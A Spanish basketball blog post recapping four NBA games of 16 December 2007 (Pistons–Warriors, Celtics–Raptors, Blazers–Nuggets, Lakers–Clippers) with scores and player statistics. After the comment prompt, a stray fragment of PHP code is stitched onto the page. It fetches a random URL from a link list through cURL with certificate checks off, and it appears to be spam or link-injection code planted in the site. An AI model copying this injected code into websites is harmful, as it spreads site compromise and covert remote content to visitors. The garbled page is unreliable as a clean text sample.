La crónica (16/12/07)

17 de December de 2007 por MagicJohnson32

El domingo nos dejó cuatro partidos y una sola sorpresa, que no lo es tanto: el triunfo de los emergentes Blazers en pista de los Nuggets. El día se abrió con la tormenta de nieve y juego que le cayó encima a los Warriors en su paso por Detroit; a continuación, los Celtics volvieron a echar mano de su implacable defensa para llevar su cifra de victorias hasta las 20 con un cómodo triunfo en Toronto; por último, el derbi angelino, un tanto descafeinado por las bajas de los Clippers, fue para los Lakers de Bryant & Bynum.

 

Vamos con las cuatro crónicas de los partidos jugados ayer:

Warriors 87 – 109 Pistonsauburnhillsempty

La tormenta de nieve no fue lo peor que se encontraron los Warriors en su visita a Detroit; lo peor para ellos fueron los Pistons, que pasaron por encima de los californianos en un encuentro disputado a las 12:30 horas en un pabellón medio vacío. Tan rápidamente se decidió el encuentro (con un 13-33 en el segundo cuarto) que Don Nelson prefirió sentar a sus titulares y dar minutos a los menos habituales, como Belinelli, Wright o Croshere. El dato más significativo de lo que fue el partido para los Warriors lo ofrece la estadística de su líder, Baron Davis: 2 puntos con 1 de 8 en tiros, 1 asistencia, 3 pérdidas. El mejor jugador del encuentro fue Tayshaun Prince, que logró 23 puntos y encabezó a otros cinco pistons en dobles figuras. El triunfo sirve a los de Michigan para superar a Orlando Magic y colocarse segundos en el Este, sólo por detrás de los Celtics.

rondoboshRaptors 77 – 90 Celtics

Ya son nueve seguidas. Los Celtics igualaron su mejor racha en 14 años al superar con claridad a los Raptors, a los que dejaron por debajo del 40% de acierto en tiros de campo. Chris Bosh, con 17 puntos, 13 rebotes y 5 asistencias, y Kris Humphries, con 12-9 y 2 tapones, fueron de lo poco que se salvó en los canadienses, mientras que los Celtics no echaron en falta a Ray Allen y contaron con seis jugadores con 10 o más puntos, con Garnett y Pierce a la cabeza. Calderón, de nuevo titular ante la ausencia de TJ, logró 8 puntos, 5 asistencias, 4 rebotes en 34 minutos de juego. Los Celtics se sitúan ya con 20 triunfos y dos únicas derrotas.

Blazers 116 – 105 Nuggets

¿Empezamos a tomarnos en serio a los Blazers? El conjunto de Portland logró anoche en Denver su séptimo triunfo consecutivo, el tercero fuera de casa (tras empezar la temporada con nueve derrotas en sus primeros nueve compromisos como visitante) y ya ha situado al 50% su balance de victorias-derrotas, igualado con Houston Rockets. Brandon Roy volvió a dirigir las operaciones con 26 puntos, 11 asistencias y 6 rebotes, y ayer se le añadió Frye, en su mejor partido en mucho tiempo, con 10 de 13 en tiros para 20 puntos y 9 rebotes. Además, volvieron a brillar desde el banco Travis Outlaw y James Jones, con 31 puntos y 12 rebotes entre ambos. Iverson fue el mejor local con 38 puntos (11 de 22 en tiros de campo y 13 de 15 en libres), 6 asistencias y 3 robos, pero Carmelo sigue desacertado en el tiro (6 de 17) y Camby no dominó las zonas como en otras ocasiones (se quedó en 4 puntos, 7 rebotes, 2 tapones, aunque repartió 9 asistencias). Los del Estado de Oregon se marcharon pronto en el marcador, anotaron 30 o más puntos en cada uno de los tres primeros cuartos, y no vieron peligrar el triunfo en ningún momento, y eso sin LaMarcus Aldridge, en su cuarto partido de ausencia por lesión.

Clippers 92 – 113 Lakers

Kobe Bryant no durmió la noche anterior y la dedicó a someterse a la terapia para recuperarse de la lesión que se produjo en los instantes finales del Lakers-Warriors del viernes y llegar a tiempo del partido contra los Clippers. Por lo visto, funcionó: Bryant anotó 32 puntos en 36 minuto con 11 de 22 en tiros, 8 rebotes y 3 asistencias para liderar el triunfo de Lakers en el derbi angelino. El esperado duelo Kaman-Bynum dio de sí y el joven pívot de los Lakers demostró su categoría con 7 de 9 en tiros de campo, 6 tapones, 9 rebotes y 3 asistencias; Kaman bajó ligeramente su rendimiento pero aun así firmó 18 puntos (6 de 19 en tiros), 16 rebotes y 3 asistencias. Corey Maggette fue, con 27 puntos, el máximo anotador de los Clippers, que a sus ya habituales bajas (Brand, Livingston y Cassell) añadieron ayer la de Tim Thomas. Los Lakers pusieron el partido de cara con un 15-1 durante el primer cuarto, y sentenciaron en el arranque del último periodo de la mano de Bryant y Vujacic, autor de 14 puntos en los últimos doce minutos.

lukedrewkobebench

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>